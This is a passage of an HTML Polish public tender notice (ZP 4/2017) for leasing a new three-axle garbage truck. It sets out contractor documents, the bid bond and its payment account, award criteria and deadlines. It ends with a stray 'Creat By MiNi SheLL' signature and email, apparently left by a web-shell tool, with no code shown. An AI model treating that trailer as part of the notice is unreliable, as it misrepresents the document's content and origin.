                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy - Załącznik nr 3 do SIWZ
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, 
w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2.	Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz 
z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Oświadczenie zgodne z Załącznikiem nr 6 do SIWZ </div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">dokumenty referencyjne przedmiotu umowy oraz szczegółową specyfikację oferowanego pojazdu wraz z zabudową  zgodnie z wymaganiami zawartymi w szczegółowej charakterystyce przedmiotu zamówienia  Załącznik nr 1 do SIWZ. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Warunkiem uczestnictwa w postępowaniu przetargowym o udzielenie zamówienia jest wniesienie przez Wykonawcę wadium  w wysokości: 14 200,00 zł. 
2.	Wadium może być wniesione w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy 
z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.
 z 2016 r. poz. 359). 
Oferent sam wybiera sobie formę wadium.
3.	W przypadku wyboru wniesienia wadium w postaci gwarancji i poręczeń, o których mowa w ust. 2 pkt b  e, z treści dokumentu musi wynikać bezwarunkowe, nieodwołalne  zobowiązanie gwaranta na pierwsze pisemne żądanie Zamawiającego do zapłaty na jego rzecz kwoty określonej w gwarancji w sytuacji gdy: 
3.1	Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy, 
c)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe 
z przyczyn leżących po stronie Wykonawcy
3.2	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 Ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Ustawy, co powoduje brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
W przypadku wnoszenia wadium w postaci niepieniężnej należy złożyć dokument wadialny 
w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez Zamawiającego nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami (np.: umieszczony w koszulce, co pozwoli na swobodne oddzielenie dokumentu wadialnego od reszty dokumentów). 

4.	W przypadku wyboru formy pieniężnej, wadium należy wpłacać na konto: ING Bank Śląski S.A. o/Będzin nr konta: 61 1050 1227 1000 0008 0156 1002 z dopiskiem: Wadium do postępowania nr: ZP  4/2017 pn.: Leasing z dostawą nowego pojazdu typu śmieciarka na podwoziu trzyosiowym. Wniesienia wadium należy dokonać najpóźniej do dnia 10.05.2017r. do godz. 12:00, a dowód wniesienia dołączyć do oferty. Za skutecznie wniesione wadium w pieniądzu uważa się wadium, które 
w wyznaczonym terminie znajduje się na koncie Zamawiającego.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy przedmiotu zamówienia</td><td>20</td></tr><tr><td>Gwarancja</td><td>10</td></tr><tr><td>Serwis</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com